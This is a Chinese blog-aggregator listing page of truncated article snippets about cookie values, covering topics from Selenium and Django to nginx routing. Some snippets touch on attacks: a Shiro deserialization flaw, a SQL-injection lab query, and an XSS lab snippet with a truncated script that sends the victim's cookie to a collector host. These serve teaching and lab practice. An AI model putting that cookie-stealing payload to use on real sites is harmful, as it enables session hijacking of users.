影响版本: Apache Shiro <= 1.2.4 原因分析: Apache Shiro默认使用了CookieRememberMeManager,其处理cookie的流程是:得到rememberMe的cookie值 > Base64解码–>AES解密–>反序列化。然而AES的密钥是硬编码的,就导 ...
分类:
Web程序 时间:
2020-03-23 16:39:23
阅读次数:
1131
在登录之后,可能服务器是分布式的,因此不能通过一个本地的session来管理登录信息,导致登录的信息不能传递,即在这台服务器上可以得到用户登录信息,但在那台就得不到。因此,需要设置分布式的session,方法是,使用一个token,存在客户端的本地cookie,当接收请求时,从客户端将cookie值 ...
分类:
编程语言 时间:
2020-02-20 22:15:56
阅读次数:
89
xss后台的安装 重定向到另一个可信网址 让点击者 不知情 1.cookie值获取 查看源代码 在反射型xss(get)页面下使用 <script> document.location = 'http://192.168.50.100/pkxss/xcookie/cookie.php?cookie= ...
分类:
其他好文 时间:
2020-02-12 19:02:30
阅读次数:
356
less20 输入用户名和密码之后 显示 很多信息 其中有一个cookie值,作为下次登陆的凭证 cookie 比如 登录QQ空间 登录一次过后,可以不使用用户名和密码 就可以登录账号 $sql=“SELECT * FROM users WHERE username=‘$cookee’ LIMIT ...
分类:
其他好文 时间:
2020-01-27 20:42:07
阅读次数:
99
1、根据cookie实现灰度配置 查询cookie键为version的值,如果该cookie值为V1则转发到server_01,为V2则转发到server_02,cookie值都不匹配的情况下默认走server_01所对应的服务器。 (1)、使用if指令实现 (2)、使用map指令实现 2、根据权重 ...
分类:
其他好文 时间:
2020-01-20 20:37:55
阅读次数:
226
前言 selenium进行自动化过程中,常需要用到cookie操作,常用的cookie操作有:获取所有cookie、获取具体cookie值、删除cookie、添加cookie等。 Chrome中查看cookie 1. Chrome打开开发者模式 windows:快捷键F12 Mac ios :快捷键 ...
分类:
编程语言 时间:
2020-01-03 22:45:56
阅读次数:
147
进行接口请求时,如果第3个接口请求用到了第1次请求和第2次请求的cookie值,需要把两次的cookie合并 https://blog.csdn.net/titiyufeng/article/details/53182951?locationNum=5&fps=1 ...
分类:
编程语言 时间:
2020-01-01 16:33:05
阅读次数:
285
Django的配置: pycharm中创建django工程之后注释掉MIDDLEWARE项中的'django.middleware.csrf.CsrfViewMiddleware'。此处作用是为了能够让js获取到cookie值 同时为了使用mysql,我们在setting中修改DATABASES中的 ...
分类:
Web程序 时间:
2019-10-21 09:31:16
阅读次数:
291
基础概念 请求:客户端访问服务端 响应:服务端对客户端的应答 示例图 带有特殊请求头和cookie值得客户端请求方式 使用:http.NewRequest,Do()组合。并且在创建请求的时候,带上cookie值和其他请求头 参考代码 go package main import ( "bytes" ...
分类:
其他好文 时间:
2019-10-19 18:55:06
阅读次数:
178
1.无状态登录原理 (1)有状态登录概述 有状态服务,即服务端需要记录每次会话的客户端信息,从而识别客户端身份,根据用户身份进行请求的处理,典型的设计如tomcat中的session。 例如登录:用户登录后,我们把登录者的信息保存在服务端session中,并且给用户一个cookie值,记录对应的se ...
分类:
其他好文 时间:
2019-10-06 16:46:46
阅读次数:
67
